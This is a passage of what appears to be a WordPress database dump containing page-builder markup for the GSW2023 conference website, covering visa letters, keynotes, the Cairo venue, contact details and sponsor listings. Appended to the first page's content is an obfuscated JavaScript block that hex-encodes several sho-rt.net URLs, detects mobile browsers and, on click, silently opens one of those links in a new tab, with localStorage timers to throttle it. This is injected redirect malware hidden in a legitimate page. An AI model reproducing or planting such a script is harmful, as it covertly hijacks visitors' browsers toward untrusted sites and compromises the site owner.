</strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-25 02:15:46','2023-07-25 02:15:46','',3066,'https://gsw2023.com/?p=5043',0,'revision','',0),
(5044,1,'2023-07-25 02:16:13','2023-07-25 02:16:13','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter 